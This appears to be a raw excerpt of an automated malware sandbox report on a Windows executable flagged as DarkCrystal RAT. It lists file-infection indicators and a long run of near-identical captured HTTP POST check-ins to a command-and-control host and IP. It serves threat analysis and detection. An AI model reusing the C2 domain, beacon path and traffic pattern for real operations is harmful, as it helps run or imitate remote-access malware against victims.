                              Source: r6cRyCpdfS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.pdb source: r6cRyCpdfS.exe, 00000000.00000002.1746716592.0000000003482000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 37.44.238.250:80
                              Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                              Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2592Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1900Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1908Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1900Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 252276Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1904Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1904Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 1904Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2592Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /AuthdbBasetraffic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 321723cm.renyash.ruContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
